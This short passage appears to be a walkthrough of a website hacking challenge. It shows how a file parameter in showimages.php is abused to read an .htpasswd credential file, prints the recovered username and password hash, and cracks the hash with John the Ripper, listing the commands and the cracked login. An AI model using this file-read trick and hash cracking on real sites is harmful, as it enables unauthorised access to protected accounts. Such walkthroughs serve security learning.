Now that you know .htpasswd files store the username and password you will need to get into the site, how do you get this file.
Well, you have to play with the site. After doing some work you will come across this page:
showimages.php?file=bush.txt |
showimages.php?file=images/admin/.htpasswd |
You now know that the username is administrator and the password is aH0qcQOVz7e0s. The challenge now how to crack the encrypted password.
John the Ripper is a good program for this. You can download it and run the john.exe file. What you need to do is take the password you now have and copy that to a text file but add p: to the beginning of it.
Example: p: aH0qcQOVz7e0s |
john.exe c:/password.txt |
john.exe –show c:/password.txt |
uid: administrator pwd: company |